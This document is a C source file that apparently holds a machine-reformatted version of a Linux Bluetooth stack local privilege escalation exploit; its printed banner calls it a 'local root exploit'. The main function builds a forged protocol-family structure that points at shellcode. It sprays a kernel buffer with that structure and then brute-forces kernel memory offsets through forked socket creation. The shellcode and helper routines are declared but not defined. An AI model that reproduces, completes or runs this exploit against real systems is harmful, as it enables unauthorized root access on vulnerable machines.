
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct net_proto_family {int authentication; int encryption; int encrypt_net; int owner; int* create; int family; } ;
typedef scalar_t__ pid_t ;


 int AF_BLUETOOTH ;
 int KERNEL_SPACE_BUFFER ;
 unsigned int KERNEL_SPACE_MEMORY_BRUTE_END ;
 unsigned int KERNEL_SPACE_MEMORY_BRUTE_START ;
 scalar_t__ asmcode ;
 int brute_socket_create (unsigned int) ;
 int bzero (struct net_proto_family*,int) ;
 int check_zombie_child (int,scalar_t__) ;
 int fflush (int ) ;
 scalar_t__ fork () ;
 scalar_t__ malloc (int) ;
 int printf (char*) ;
 int stdout ;

int main(void)
{

pid_t pid;
int counter;
int status;
int *kernel_return;

char kernel_buffer[KERNEL_SPACE_BUFFER];
unsigned int brute_start;
unsigned int where_kernel;

struct net_proto_family *bluetooth;

bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family));
bzero(bluetooth,sizeof(struct net_proto_family));

bluetooth->family = AF_BLUETOOTH;
bluetooth->authentication = 0x0;
bluetooth->encryption = 0x0;
bluetooth->encrypt_net = 0x0;
bluetooth->owner = 0x0;
bluetooth->create = (int *) asmcode;



kernel_return = (int *) kernel_buffer;

for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++)
   *kernel_return = (int)bluetooth;

brute_start = KERNEL_SPACE_MEMORY_BRUTE_START;
printf("Bluetooth stack local root exploit\n");
printf("http://backdoored/net");

while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END )
 {
   where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;
   where_kernel = -where_kernel;

   pid = fork();
   if(pid == 0 )
   brute_socket_create(where_kernel);
   check_zombie_child(status,pid);
   brute_start += KERNEL_SPACE_BUFFER;
   fflush(stdout);
}
return 0;
}
